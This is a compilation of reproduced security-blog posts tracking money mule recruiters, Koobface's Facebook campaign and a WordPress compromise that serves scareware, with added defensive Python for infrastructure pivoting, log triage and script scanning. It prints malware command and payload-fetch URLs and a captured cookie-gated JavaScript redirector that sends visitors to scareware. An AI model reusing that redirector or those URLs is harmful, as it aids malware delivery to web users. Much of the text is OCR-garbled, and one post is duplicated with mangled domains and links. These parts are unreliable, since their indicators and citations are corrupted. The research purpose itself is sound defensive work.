Moreover, this persistent money mule recruitment syndicate has a domain registrar of choice in the face of the Turkish [3]ALATRON BUD., which is seen in the majority of domain registrations.

The following active name servers have been gathered from the money mule recruitment campaigns profiled in previous posts:

• [4]Keeping Money Mule Recruiters on a Short Leash - Part Four

• [5]Keeping Money Mule Recruiters on a Short Leash - Part Three

• [6]Keeping Money Mule Recruiters on a Short Leash - Part Two

• [7]Keeping Money Mule Recruiters on a Short Leash

• [8]Keeping Reshipping Mule Recruiters on a Short Leash

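The pivot the post performs by hand (counting name servers per AS, then linking zones through shared name-server IPs and registrant mailboxes), as an added example that is not part of the original post. The record format mirrors the post's "nsN.domain - IP - Email: addr - ASnnnn, owner" lines; the sample records are constructed (documentation IP ranges, example.net mailboxes, placeholder zone names), with only the AS numbers and owner names taken from the post.

```python
"""Pivot helper for name-server records in the post's 'ns - ip - Email - AS' format.

Added example, not the post's own code. Sample records are constructed:
documentation IP ranges, example.net mailboxes and placeholder zone names;
only the AS numbers and owner names are taken from the post.
"""
import re
from collections import Counter, defaultdict

# 'AS29182' or 'AS 31103' (the post writes both forms)
AS_RE = re.compile(r"\bAS\s?(\d+)")


def parse_record(line):
    """Parse one 'ns - ip [- Email: addr] [- prefix] - ASnnnn, owner' line.

    Returns a dict, or None when no AS number is present. Owner names may
    contain commas ('Great Lakes Comnet, Inc.'), so the AS is located by
    regex instead of splitting the last field on commas.
    """
    pieces = [p.strip() for p in line.split(" - ")]
    if len(pieces) < 3:
        return None
    rec = {"ns": pieces[0].lower(), "ip": pieces[1], "email": None, "prefix": None}
    for piece in pieces[2:]:
        if piece.startswith("Email:"):
            rec["email"] = piece[len("Email:"):].strip().lower()
            continue
        m = AS_RE.search(piece)
        if m is None:
            if "/" in piece:            # bare CIDR prefix in its own field
                rec["prefix"] = piece
            continue
        before = piece[:m.start()].strip(" ,")
        if before:                      # 'prefix, ASnnnn, owner' in one field
            rec["prefix"] = before
        rec["asn"] = "AS" + m.group(1)
        rec["owner"] = piece[m.end():].strip(" ,")
    return rec if "asn" in rec else None


def build_pivots(records):
    """Count name servers per AS and index zones by shared IP and mailbox."""
    by_asn = Counter()               # the post's headline statistic
    owner = {}
    by_ip = defaultdict(set)         # zones whose name servers share one IP
    by_email = defaultdict(set)      # zones registered with one mailbox
    for r in records:
        zone = r["ns"].split(".", 1)[1]
        by_asn[r["asn"]] += 1
        owner[r["asn"]] = r["owner"]
        by_ip[r["ip"]].add(zone)
        if r["email"]:
            by_email[r["email"]].add(zone)
    return by_asn, owner, by_ip, by_email


def clusters(by_ip, by_email):
    """Union-find over zones: any shared IP or mailbox links two zones."""
    parent = {}

    def find(x):
        parent.setdefault(x, x)
        while parent[x] != x:
            parent[x] = parent[parent[x]]
            x = parent[x]
        return x

    for group in list(by_ip.values()) + list(by_email.values()):
        members = sorted(group)
        for z in members:
            parent[find(z)] = find(members[0])
    groups = defaultdict(set)
    for z in list(parent):
        groups[find(z)].add(z)
    return sorted(sorted(g) for g in groups.values())


def summarize(lines):
    """End to end: parse, pivot, cluster. Returns (per-AS counts, clusters)."""
    records = [r for r in map(parse_record, lines) if r is not None]
    by_asn, _owner, by_ip, by_email = build_pivots(records)
    return by_asn, clusters(by_ip, by_email)


# Constructed sample in the post's format (not the post's actual records).
SAMPLE_RECORDS = [
    "ns1.mule-zone-a.example - 192.0.2.10 - Email: recruiter-a@example.net - 192.0.2.0/24 - AS29182, ISPSYSTEM-AS ISPsystem Autonomous System",
    "ns2.mule-zone-a.example - 198.51.100.2 - AS34305, EUROACCESS Global Autonomous System",
    "ns3.mule-zone-a.example - 203.0.113.112 - AS38356, TimeNet",
    "ns1.mule-zone-b.example - 192.0.2.10 - Email: recruiter-b@example.net - AS29182, ISPSYSTEM-AS ISPsystem Autonomous System",
    "ns2.mule-zone-b.example - 198.51.100.2 - AS34305, EUROACCESS Global Autonomous System",
    "ns3.mule-zone-b.example - 203.0.113.234 - AS38356, TimeNet",
    "ns1.mule-zone-c.example - 192.0.2.143 - Email: recruiter-a@example.net - 192.0.2.128/25, AS30517, Great Lakes Comnet, Inc.",
    "ns2.mule-zone-c.example - 198.51.100.250 - AS32097, RoadRunner RR-RC-Wholesale Internet, Inc.-KansasCity",
    "ns3.mule-zone-c.example - 203.0.113.82 - AS46664, VolumeDrive",
    "ns1.unrelated.example - 192.0.2.77 - Email: other@example.net - AS 31103, KEYWEB-AS Keyweb AG",
]

if __name__ == "__main__":
    by_asn, linked = summarize(SAMPLE_RECORDS)
    for asn, n in by_asn.most_common():
        print(f"{asn}: {n} name servers")
    for group in linked:
        print("linked zones:", ", ".join(group))
```

Zones a and b share name-server IPs, and zone c shares only a registrant mailbox with a; the union-find still joins all three, which is the kind of link the post draws between campaigns.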

The business model of this syndicate can easily be compared to that of the much-hyped Russian Business Network in the sense that they are either managing the infrastructure for someone else as a service, are directly involved in the recruitment and utilization of money mules for their own purposes, or are basically building an inventory of mules to offer as a service to a large number of cybercriminals.

The basic fact that these folks are not campaign-centered but continue maintaining their ecosystem puts them at the top of the watch list for months to come.

Related coverage of money laundering in the context of cybercrime:

[9]Keeping Money Mule Recruiters on a Short Leash - Part Four

[10]Money Mule Recruitment Campaign Serving Client-Side Exploits

[11]Keeping Money Mule Recruiters on a Short Leash - Part Three

[12]Money Mule Recruiters on Yahoo!'s Web Hosting

[13]Dissecting an Ongoing Money Mule Recruitment Campaign

[14]Keeping Money Mule Recruiters on a Short Leash - Part Two

[15]Keeping Reshipping Mule Recruiters on a Short Leash

[16]Keeping Money Mule Recruiters on a Short Leash

[17]Standardizing the Money Mule Recruitment Process

[18]Inside a Money Laundering Group's Spamming Operations

[19]Money Mule Recruiters use ASProx's Fast Fluxing Services

[20]Money Mules Syndicate Actively Recruiting Since 2002

This post has been reproduced from [21]Dancho Danchev's blog. Follow him [22]on Twitter.
mule-recruiters-on-short.html

10. http://ddanchev.blogspot.com/2010/03/money-mule-recruitment-campaign-serving.html

11. http://ddanchev.blogspot.com/2010/03/keeping-money-mule-recruiters-on-short.html

12. http://ddanchev.blogspot.com/2010/03/money-mule-recruiters-on-yahoos-web.html

13. http://ddanchev.blogspot.com/2010/02/dissecting-ongoing-money-mule.html

14. http://ddanchev.blogspot.com/2010/02/keeping-money-mule-recruiters-on-short.html

15. http://ddanchev.blogspot.com/2009/12/keeping-reshipping-mule-recruiters-on.html

16. http://ddanchev.blogspot.com/2009/11/keeping-money-mule-recruiters-on-short.html

17. http://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.html

18. http://ddanchev.blogspot.com/2009/05/inside-money-laundering-groups-spamming.html

19. http://ddanchev.blogspot.com/2008/07/money-mule-recruiters-use-asproxs-fast.html

20. http://ddanchev.blogspot.com/2008/10/money-mules-syndicate-actively.html

21. http://ddanchev.blogspot.com/

22. http://twitter.com/danchodanchev
Dissecting Koobface Gang's Latest Facebook Spreading Campaign (2010-04-27 14:53)

UPDATED: Thursday, April 29, 2010: Google is aware of these Blogspot accounts and is currently suspending them.

During the weekend, our "dear friends" from [1]the Koobface gang - folks, you're so not forgotten, with the scale of diversification of your activities to be publicly summarized within the next few days - launched another spreading attempt across Facebook, with Koobface-infected users posting bogus video links on their walls.

• Recommended reading: [2]10 things you didn't know about the Koobface gang

What's particularly interesting about the campaign is that the gang is now starting to publicly acknowledge its connections with [3]xorg.pl (Malicious software includes 40706 scripting exploit(s), 4119 trojan(s), 1897 exploit(s)), with an actual subdomain residing there embedded on Koobface-serving compromised hosts.

Moreover, the majority of scareware domains, including the redirectors, continue using hosting services in Moldova, AS31252, STARNET-AS StarNet Moldova in particular.

• [4]Koobface Redirectors and Scareware Campaigns Now Hosted in Moldova

With the campaign still ongoing, it's time to dissect it, expose the scareware domains portfolio and the AS29073, ECATEL-AS connection, with the Koobface gang a loyal customer of their services since November, 2009. AS29073, ECATEL-AS Koobface gang connections:

• [5]Koobface Botnet's Scareware Business Model - Part Two

• [6]The Koobface Gang Wishes the Industry "Happy Holidays"

Automatically registered Blogspot accounts used as bogus video links across Facebook:


UPDATED: Thursday, April 29, 2010: another update - Blogspot accounts courtesy of the Koobface gang:


The Blogspot accounts redirect to the following compromised Koobface- and scareware-serving domains:



Detection rates for Koobface samples and a sampled scareware:

- setup.exe - [7]Trojan.Generic.KD.8890 - Result: 9/40 (22.50 %), phones back to:

- proelec-dpt.fr/.85rfs/?action=ldgen&a=-1394498804&v=108&c_fb=0&ie=7.0.5730.13

- proelec-dpt.fr/.85rfs/?action=fbgen&v=108&crc=669

- proelec-dpt.fr/.85rfs/?getexe=p.exe

- p.exe - [8]Trojan.Drop.Koobface.J; W32/Koobface.GUB - Result: 5/41 (12.2 %)

- koob.js - [9]Trojan:JS/Redirector - Result: 1/41 (2.44 %)

The scareware serving domain embedded on all of the Koobface-serving compromised hosts is internet-scanner.xorg.pl?mid=312&code=4db12f&d=1&s=2 - 195.5.161.125 - AS31252, STARNET-AS StarNet Moldova.

Parked on 195.5.161.125 is the rest of the scareware domains portfolio:


protection-centerl .xorg.pl 

protectorl 0. xorg.pl 

securelO.xorg.pl 
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security 1 .xorg.pl 
security 100.xorg.pl 
spy-defenderl. com 


spydefenderl. com.xorg.pl 
spydefenderl 1. com.xorg.pl 
spy-defenderla.com - Email: test@now.net.cn 
spy-defender2.com - Email: test@now.net.cn 
spy-defender2a.com - Email: test@now.net.cn 
spy-defender4a.com - Email: test@now.net.cn 
spy-defender5.com - Email: test@now.net.cn 
spy-defender6a.com - Email: test@now.net.cn 
spy-defender8a.com - Email: test@now.net.cn 
spy-defender9.com - Email: test@now.net.cn 
spy-protection01.com - Email: test@now.net.cn 
spy-protectionl.com - Email: test@now.net.cn 
spy-protectionl4.com - Email: test@now.net.cn 
spy-protectionl7.com - Email: test@now.net.cn 
spy-protectionl9.com - Email: test@now.net.cn 
spy-protection3.com - Email: test@now.net.cn 
spy-protection4.com - Email: test@now.net.cn 
spy-protection6.com - Email: test@now.net.cn 
spy-protection8.com - Email: test@now.net.cn 
spy-scanner2i.com - Email: test@now.net.cn 



spy-scanner6i.com - Email: test@now.net.cn 
spy-scanner8i.com - Email: test@now.net.cn 
spyware-sweepl.com - Email: test@now.net.cn 
spyware-sweepli.com - Email: test@now.net.cn 
spyware-sweep2i.com - Email: test@now.net.cn 
spyware-sweep3.com - Email: test@now.net.cn 
spyware-sweep3i.com - Email: test@now.net.cn 
spyware-sweep4i.com - Email: test@now.net.cn 
spyware-sweep5.com - Email: test@now.net.cn 
spyware-sweep7.com - Email: test@now.net.cn 
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spyware-sweep8.com - Email: test@now.net.cn 
spyware-sweep9i.com - Email: test@now.net.cn 
virus-sweeperOi.com - Email: test@now.net.cn 
virus-sweeperl.com - Email: test@now.net.cn 
virus-sweeper2.com - Email: test@now.net.cn 
virus-sweeper2i.com - Email: test@now.net.cn 
virus-sweeper3.com - Email: test@now.net.cn 
virus-sweeper4i.com - Email: test@now.net.cn 


virus-sweeper6.com - Email: test@now.net.cn 
virus-sweeper7i.com - Email: test@now.net.cn 
virus-sweeper8.com - Email: test@now.net.cn 
virus-sweeper8i.com - Email: test@now.net.cn 

win-antispywarel 0. com.xorg.pl 

windefenderl .xorg.pl 

win do ws-secure.xorg.pl 

win-security.xorg.pl 

win webscannerl 0. com.xorg.pl 

Parked within AS31252, STARNET-AS Star Net Moldova are 
also: 195.5.161.11; 195.5.161.145 

spy-scanner20.com - Email: test@now.net.cn 

spy-scanner30.com - Email: test@now.net.cn 

spy-scanner3i.com - Email: test@now.net.cn 

spy-scanner40.com - Email: test@now.net.cn 

spy-scanner4i.com - Email: test@now.net.cn 

spy-scanner60.com - Email: test@now.net.cn 

spy-scanner80.com - Email: test@now.net.cn 

virscanner-done4.com - Email: test@now.net.cn 

virscanner-done5.com - Email: test@now.net.cn 



- Detection rate for the scareware sample: Setup _312s2.exe 

- [10 JHeuristic.Beha vesLike. Win32. Trojan.H - Result: 
5/40 (12.50 %) phones back to windows-mode.com/? 
b=lsl - 89.248.168.21, AS29073, ECATEL-AS, Ecatel 

Network - Email: contact@privacy-protect.cn 
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Parked on the phone-back IP are also the following domains: 

firewall-rules2.com - Email: contact@privacy-protect.cn 

version-upgrade.com - Email: contact@privacy-protect.cn 

2accommodation.com - Email: ttvmaill2@hotmail.com 

systemreserves.com - Email: contact@privacy-protect.cn 

cariport.com - Email: contact@privacy-protect.cn 

spybiocktest.com - Email: contact@privacy-protect.cn 

antispywareiist.com - Email: contact@privacy-protect.cn 

checkwhiteiist.com - Email: contact@privacy-protect.cn 

chekmalwareiist.com - Email: contact@privacy-protect.cn 

Stay tuned for more updates on recent Koobface gang 
activities, beyond the Koobface botnet. 

Related Koobface gang/botnet research: 

[HJKoobface Redirectors and Scareware Campaigns Now 
Hosted in Moldova 


[12J10 things you didn't know about the Koobface gang 

[13] A Diverse Portfolio of Scareware/Blackhat SEO 
Redirectors Courtesy of the Koobface Gang 

[14] How the Koobface Gang Monetizes Mac OS X Traffic 

[15] The Koobface Gang Wishes the Industry "Happy 
Holidays" 

[16] Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken 
Offline 

[17] Koobface Botnet Starts Serving Client-Side Exploits 

[18] Massive Scareware Serving Blackhat SEO, the Koobface 
Gang Style 

[19] Koobface Botnet's Scareware Business Model - Part Two 

[20] Koobface Botnet's Scareware Business Model - Part One 

[21 ]Koobface Botnet Redirects Face book's IP Space to my 
Blog 

[22] New Koobface campaign spoofs Adobe's Flash updater 

[23] Social engineering tactics of the Koobface botnet 

[24] Koobface Botnet Dissected in a Trend Micro Report 

[25] Movement on the Koobface Front - Part Two 

[26] Movement on the Koobface Front 

[27] Koobface - Come Out, Come Out, Wherever You Are 
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[28]Dissecting Koobface Worm's Twitter Campaign 

This post has been reproduced from [29]Dancho 
Danchev's blog. Follow him [30]on Twitter. 

1. http://twitter.com/Real_Koobface 

2. httD://bloas. zdnet. com/securit v/? p=5452 

3. httoj//www.aooale.com/safebrowsina/diaanostic? 
site=xor a.D\/ 
Dissecting Koobface Gang's Latest Facebook Spreading Campaign (2010-04-27 14:53) 

UPDATED: Thursday, April 29, 2010: Google is aware of 
these Blogspot accounts, and is currently suspending them. 

During the weekend, our "dear friends" from [1]the Koobface gang - folks, you're so not forgotten, with the scale of diversification of your activities to be publicly summarized within the next few days - launched another spreading attempt across Facebook, with Koobface-infected users posting bogus video links on their walls. 

• Recommended reading: [2] 10 things you didn't know 
about the Koobface gang 

What's particularly interesting about the campaign is that the gang is now starting to publicly acknowledge its connections with [3]xorg.pl (malicious software includes 40706 scripting exploit(s), 4119 trojan(s), 1897 exploit(s)), with an actual subdomain residing there embedded on the Koobface-serving compromised hosts. 

Moreover, the majority of the scareware domains, including the redirectors, continue using hosting services in Moldova, AS31252, STARNET-AS StarNet Moldova in particular. 

• [4] Koobface Redirectors and Scareware Campaigns Now Hosted in Moldova 
With the campaign still ongoing, it's time to dissect it, expose the scareware domains portfolio and the AS29073, ECATEL-AS connection, with the Koobface gang a loyal customer of their services since November, 2009. AS29073, ECATEL-AS Koobface gang connections: 

• [5]Koobface Botnet's Scareware Business Model - 
Part Two 


• [6]The Koobface Gang Wishes the Industry "Happy 
Holidays" 

Automatically registered Blogspot accounts used as bogus video links across Facebook: 

UPDATED: Thursday, April 29, 2010: Another update, more Blogspot accounts courtesy of the Koobface gang: 

The Blogspot accounts redirect to the following compromised Koobface- and scareware-serving domains: 

[Screenshot placed among the redirector URLs: the obfuscated JavaScript served to visitors. The page is titled "Loading" and carries a robots "noindex, nofollow, noarchive" meta tag; the script breaks out of frames by resetting window.parent.location and window.top.location, reads the browser version out of navigator.userAgent and navigator.appVersion, rebuilds its real content from junk-padded strings with regex replace() calls, registers an unload handler, and writes the result with document.write.] 

Detection rates for the Koobface samples and a sampled scareware: 

- setup.exe - [7]Trojan.Generic.KD.8890 - Result: 9/40 (22.50 %) phones back to: 

- proelec-dpt.fr/.85rfs/?action=ldgen&a=-1394498804&v=108&c_fb=0&ie=7.0.5730.13 

- proelec-dpt.fr/.85rfs/?action=fbgen&v=108&crc=669 

- proelec-dpt.fr/.85rfs/?getexe=p.exe 

- p.exe - [8]Trojan.Drop.Koobface.J; W32/Koobface.CUB - Result: 5/41 (12.2 %) 

- koob.js - [9]Trojan:JS/Redirector - Result: 1/41 (2.44 %) 

The scareware-serving domain embedded on all of the Koobface-serving compromised hosts is internet-scanner.xorg.pl?mid=312&code=4db12f&d=1&s=2 - 195.5.161.125 - AS31252, STARNET-AS StarNet Moldova. 
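The chain laid out so far (bogus Blogspot video link, compromised host serving a video-themed directory with main.php?<hex>, the .85rfs check-in and p.exe download, then the xorg.pl scareware landing) can be turned into a stage map over web-proxy logs. This is an added example, not code from the post: the log format, the client IPs and the hosts example-lure.blogspot.com, compromised.example.org and www.example.com are constructed, while the URL patterns are the ones quoted in the post.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Stage patterns taken from the URLs quoted in the post. Each entry is
# (stage, host pattern or None, path+query pattern or None); a hit needs every
# pattern that is present to match.
STAGES = [
    # 1. Lure: a throwaway Blogspot account posted as a "video" link on Facebook.
    ("lure", re.compile(r"^[a-z0-9-]+\.blogspot\.com$"), None),
    # 2. Redirector on a compromised host: a video-themed directory in front of
    #    main.php?<short hex token>, e.g. /crazyvids/main.php?2ee
    ("redirector", None, re.compile(
        r"^/[a-z_-]*(clip|vid|movie|film|dvd|tube|tv|demonstration)[a-z_-]*"
        r"/main\.php\?[0-9a-f]{1,8}$", re.I)),
    # 3. Koobface C2: .85rfs check-in (action=ldgen / fbgen) or payload fetch (getexe=)
    ("c2", None, re.compile(r"/\.85rfs/\?(action=(ldgen|fbgen)|getexe=)")),
    # 4. Scareware landing on a xorg.pl subdomain carrying the affiliate id and code
    ("scareware", re.compile(r"(^|\.)xorg\.pl$"),
     re.compile(r"[?&]mid=\d+&code=[0-9a-f]+")),
]


def classify(url):
    """Return the campaign stage a URL belongs to, or None if it matches no stage."""
    parts = urlsplit(url)
    host = parts.netloc.lower()
    path_query = parts.path + ("?" + parts.query if parts.query else "")
    for stage, host_re, path_re in STAGES:
        if host_re is not None and not host_re.search(host):
            continue
        if path_re is not None and not path_re.search(path_query):
            continue
        return stage
    return None


def triage(log_text):
    """Map client IP -> ordered list of (timestamp, stage, host) for matching requests.

    Constructed line format for this example:
    <timestamp> <client ip> <method> <url> <status>
    """
    hits = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, _method, url, _status = line.split()
        stage = classify(url)
        if stage is not None:
            hits[client].append((ts, stage, urlsplit(url).netloc.lower()))
    return dict(hits)


def verdicts(log_text):
    """Per client: 'infected' if its bot checked in with the C2, 'exposed' if it
    only reached the redirector or the scareware landing, 'lure-only' otherwise.
    A Blogspot visit alone is weak evidence and is kept only for correlation."""
    out = {}
    for client, seq in triage(log_text).items():
        stages = [stage for _ts, stage, _host in seq]
        if "c2" in stages:
            verdict = "infected"
        elif "redirector" in stages or "scareware" in stages:
            verdict = "exposed"
        else:
            verdict = "lure-only"
        out[client] = (verdict, stages)
    return out


# Constructed proxy log: one client walks the whole chain, one is stopped at the
# redirector (HTTP 403 from a web filter), one requests an unrelated main.php.
SAMPLE_LOG = """\
2010-04-26T10:15:02 10.0.0.5 GET http://example-lure.blogspot.com/ 302
2010-04-26T10:15:03 10.0.0.5 GET http://compromised.example.org/crazyvids/main.php?2ee 200
2010-04-26T10:15:09 10.0.0.5 GET http://proelec-dpt.fr/.85rfs/?action=ldgen&a=-1394498804&v=108&c_fb=0&ie=7.0.5730.13 200
2010-04-26T10:15:10 10.0.0.5 GET http://proelec-dpt.fr/.85rfs/?getexe=p.exe 200
2010-04-26T10:15:12 10.0.0.5 GET http://internet-scanner.xorg.pl?mid=312&code=4db12f&d=1&s=2 200
2010-04-26T10:20:44 10.0.0.9 GET http://example-lure.blogspot.com/ 302
2010-04-26T10:20:45 10.0.0.9 GET http://compromised.example.org/cute_clip/main.php?be2 403
2010-04-26T10:31:00 10.0.0.12 GET http://www.example.com/news/main.php?page=2 200
"""

if __name__ == "__main__":
    for client, (verdict, stages) in sorted(verdicts(SAMPLE_LOG).items()):
        print(f"{client:<10} {verdict:<9} {' -> '.join(stages)}")
```

The redirector pattern is deliberately narrow (video-themed directory plus a short hex token); widen the keyword list from your own proxy data before relying on it, since main.php is common on legitimate sites.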

Parked on 195.5.161.125 is the rest of the scareware 
domains portfolio: 

Also parked within AS31252, STARNET-AS StarNet Moldova, on 195.5.161.11 and 195.5.161.145: 

- Detection rate for the scareware sample: Setup_312s2.exe - [10]Heuristic.BehavesLike.Win32.Trojan.H - Result: 5/40 (12.50 %) phones back to windows-mode.com/?b=lsl - 89.248.168.21, AS29073, ECATEL-AS, Ecatel Network - Email: contact@privacy-protect.cn 
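The pivot applied throughout this post, tying domains into one portfolio because they share a hosting IP or a registrant e-mail, as an added example that is not the post's own code. The records are constructed around the IPs, ASNs and registrant e-mail addresses the post names; the *.example and example.net names are invented placeholders.

```python
from collections import defaultdict

# Constructed records: (domain, hosting IP, ASN, registrant e-mail or None when
# WHOIS gave nothing). IPs, ASNs and the two registrant e-mails are the ones the
# post names; every *.example / example.net name is an invented placeholder.
RECORDS = [
    ("internet-scanner.xorg.pl", "195.5.161.125", "AS31252", None),
    ("scareware-a.example",      "195.5.161.125", "AS31252", "test@now.net.cn"),
    ("scareware-b.example",      "195.5.161.145", "AS31252", "test@now.net.cn"),
    ("windows-mode.com",         "89.248.168.21", "AS29073", "contact@privacy-protect.cn"),
    ("scareware-c.example",      "89.248.168.21", "AS29073", "other-registrant@example.net"),
    ("unrelated.example",        "203.0.113.7",   "AS64496", "hostmaster@unrelated.example"),
]

FIELD = {"domain": 0, "ip": 1, "asn": 2, "email": 3}


def cluster(records, pivots=("ip", "email")):
    """Union-find over the chosen pivot attributes; returns clusters, largest
    first, each as a dict of the domains and their IPs/ASNs/e-mails.
    ASN is deliberately not a default pivot: a whole AS hosts many unrelated
    sites, so it is reported per cluster but does not on its own link domains."""
    parent = {rec[0]: rec[0] for rec in records}

    def find(d):
        while parent[d] != d:
            parent[d] = parent[parent[d]]   # path halving
            d = parent[d]
        return d

    def union(a, b):
        ra, rb = find(a), find(b)
        if ra != rb:
            parent[rb] = ra

    first_seen = {}                         # (pivot, value) -> first domain carrying it
    for rec in records:
        for pivot in pivots:
            value = rec[FIELD[pivot]]
            if value is None:
                continue
            key = (pivot, value)
            if key in first_seen:
                union(first_seen[key], rec[0])
            else:
                first_seen[key] = rec[0]

    groups = defaultdict(list)
    for rec in records:
        groups[find(rec[0])].append(rec)

    clusters = []
    for members in groups.values():
        clusters.append({
            "domains": sorted(m[0] for m in members),
            "ips": sorted({m[1] for m in members}),
            "asns": sorted({m[2] for m in members}),
            "emails": sorted({m[3] for m in members if m[3]}),
        })
    clusters.sort(key=lambda c: (-len(c["domains"]), c["domains"]))
    return clusters


def cluster_of(domain, records=RECORDS):
    """The cluster containing a given domain, or None if it is not in the records."""
    for c in cluster(records):
        if domain in c["domains"]:
            return c
    return None


if __name__ == "__main__":
    for c in cluster(RECORDS):
        print(", ".join(c["domains"]))
        print("   ips:", c["ips"], "asns:", c["asns"], "emails:", c["emails"])
```

Note how scareware-b.example, hosted on a different IP, still lands in the xorg.pl cluster: it shares its registrant e-mail with scareware-a.example, which shares an IP with internet-scanner.xorg.pl.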

Parked on the phone-back IP are also the following domains: 

Stay tuned for more updates on recent Koobface gang 
activities, beyond the Koobface botnet. 

Related Koobface gang/botnet research: 

[11] Koobface Redirectors and Scareware Campaigns Now Hosted in Moldova 

[12] 10 things you didn't know about the Koobface gang 

[13] A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface Gang 

[14] How the Koobface Gang Monetizes Mac OS X Traffic 

[15] The Koobface Gang Wishes the Industry "Happy Holidays" 

[16] Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline 

[17] Koobface Botnet Starts Serving Client-Side Exploits 

[18] Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 

[19] Koobface Botnet's Scareware Business Model - Part Two 

[20] Koobface Botnet's Scareware Business Model - Part One 

[21] Koobface Botnet Redirects Facebook's IP Space to my Blog 

[22] New Koobface campaign spoofs Adobe's Flash updater 

[23] Social engineering tactics of the Koobface botnet 

[24] Koobface Botnet Dissected in a Trend Micro Report 

[25] Movement on the Koobface Front - Part Two 

[26] Movement on the Koobface Front 

[27] Koobface - Come Out, Come Out, Wherever You Are 

[28] Dissecting Koobface Worm's Twitter Campaign 

This post has been reproduced from [29]Dancho 
Danchev's blog. Follow him [30]on Twitter. 

1. http://twitter.com/Real_Koobface 

2. http://blogs.zdnet.com/security/?p=5452 

3. http://www.google.com/safebrowsing/diagnostic?site=xorg.pl/ 

4. http://ddanchev.blogspot.com/2010/03/koobface-redirectors-and-scareware.html 

5. http://ddanchev.blogspot.com/2009/11/koobface-botnets-scareware-business.html 

6. http://ddanchev.blogspot.com/2009/12/koobface-gang-wishes-industry-happy.html 

7. http://www.virustotal.com/analisis/69b78dd99321acb1dec25cad3da9e9a545cb7554195081e33ca99c23a24b10e3-1272294422 

8. http://www.virustotal.com/analisis/ad41ffce9c9c9f70b9a69c5cbaac2d334b42cfb03022e59dG52c493bb1f3508e-1272294936 

9. http://www.virustotal.com/analisis/30f5371a67cb6001f8bb5dc2076bfb17c24c675599e99d32adc049610bc6620b-1272295423 

10. https://www.virustotal.com/analisis/8110b790ea6600f8b712cc68b195302c450a3993df84f7163dbb7938d22e55d0-1272294429 

11. http://ddanchev.blogspot.com/2010/03/koobface-redirectors-and-scareware.html 

12. http://blogs.zdnet.com/security/?p=5452 

13. http://ddanchev.blogspot.com/2010/02/diverse-portfolio-of-scarewareblackhat.html 

14. http://ddanchev.blogspot.com/2010/02/how-koobface-gang-monetizes-mac-os-x.html 

15. http://ddanchev.blogspot.com/2009/12/koobface-gang-wishes-industry-happy.html 

16. http://ddanchev.blogspot.com/2009/12/koobface-friendly-riccom-ltd-as29550.html 

17. http://ddanchev.blogspot.com/2009/11/koobface-botnet-starts-serving-client.html 

18. http://ddanchev.blogspot.com/2009/11/massive-scareware-serving-blackhat-seo.html 

19. http://ddanchev.blogspot.com/2009/11/koobface-botnets-scareware-business.html 

20. http://ddanchev.blogspot.com/2009/09/koobface-botnets-scareware-business.html 

21. http://ddanchev.blogspot.com/2009/10/koobface-botnet-redirects-facebooks-ip.html 

22. http://blogs.zdnet.com/security/?p=4594 

23. http://content.zdnet.com/2346-12691_22-352597.html 

24. http://ddanchev.blogspot.com/2009/10/koobface-botnet-dissected-in-trendmicro.html 

25. http://ddanchev.blogspot.com/2009/08/movement-on-koobface-front-part-two.html 

26. http://ddanchev.blogspot.com/2009/08/movement-on-koobface-front.html 

27. http://ddanchev.blogspot.com/2009/07/koobface-come-out-come-out-wherever-you.html 

28. http://ddanchev.blogspot.com/2009/07/dissecting-koobface-worms-twitter.html 

29. http://ddanchev.blogspot.com/ 

30. http://twitter.com/danchodanchev 
GoDaddy's Mass WordPress Blogs Compromise Serving Scareware (2010-04-27 21:22)

The redirector script observed in the campaign (it sets a first-visit cookie and sends the visitor, once, to the scareware chain at www3.sdfhj40-td.xorg.pl; the value of the p= parameter is reproduced as captured):

    // Helper: write a cookie that expires in `expiredays` days.
    function setCookie(c_name, value, expiredays) {
        var exdate = new Date();
        exdate.setDate(exdate.getDate() + expiredays);
        document.cookie = c_name + "=" + escape(value) +
            ((expiredays == null) ? "" : ";expires=" + exdate.toGMTString());
    }

    // Helper: read a cookie by name, or "" when it is not set.
    function getCookie(c_name) {
        if (document.cookie.length > 0) {
            c_start = document.cookie.indexOf(c_name + "=");
            if (c_start != -1) {
                c_start = c_start + c_name.length + 1;
                c_end = document.cookie.indexOf(";", c_start);
                if (c_end == -1) c_end = document.cookie.length;
                return unescape(document.cookie.substring(c_start, c_end));
            }
        }
        return "";
    }

    // Redirect only on the first visit, so a repeat visitor (or an
    // investigator reloading the page) sees the blog as normal.
    var name = getCookie("pma_visited_theme1");
    if (name == "") {
        setCookie("pma_visited_theme1", "1", 20);
        var url = "http://www3.sdfhj40-td.xorg.pl?p=p52dcYpkbG6Hnc3KbitNToKVliqHWnG2aXsiYrrtnhw2Jubwg%3D%3D";
        window.top.location.replace(url);
    } else {
        // remainder of the script was not captured
    }
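A quick way to find this kind of injected redirector across a WordPress install, as an added example (this is not code from the original post or from Go Daddy): the scanner below flags any script that both touches document.cookie and calls window.top.location.replace(), then reports every absolute URL in it whose host is not the blog's own. CAPTURED_SCRIPT is a condensed transcription of the redirector above that keeps its two traits and its target; BENIGN_SCRIPT, the site name example-blog.com and the temporary directory layout are constructed for the demonstration.

```python
"""Scan WordPress theme/plugin files for a cookie-gated top-frame redirector."""
import re
import tempfile
from pathlib import Path
from typing import Dict, List
from urllib.parse import urlparse

# The two traits of the captured redirector: a cookie check and a top-frame replace().
COOKIE_RE = re.compile(r"document\.cookie", re.I)
TOP_REPLACE_RE = re.compile(r"window\.(?:top\.)?location\.replace\s*\(", re.I)
ABS_URL_RE = re.compile(r"""https?://[^\s'"<>)]+""", re.I)

# Condensed transcription of the redirector shown above (target kept as captured).
CAPTURED_SCRIPT = """
function getCookie(c_name) {
    if (document.cookie.length > 0) {
        c_start = document.cookie.indexOf(c_name + "=");
        if (c_start != -1) { return "1"; }
    }
    return "";
}
var name = getCookie("pma_visited_theme1");
if (name == "") {
    document.cookie = "pma_visited_theme1=1";
    var url = "http://www3.sdfhj40-td.xorg.pl?p=p52dcYpkbG6Hnc3KbitNToKVliqHWnG2aXsiYrrtnhw2Jubwg%3D%3D";
    window.top.location.replace(url);
} else {}
"""

# Constructed: a theme script that also uses cookies and replace(), but stays on-site.
BENIGN_SCRIPT = """
document.cookie = "theme_seen=1";
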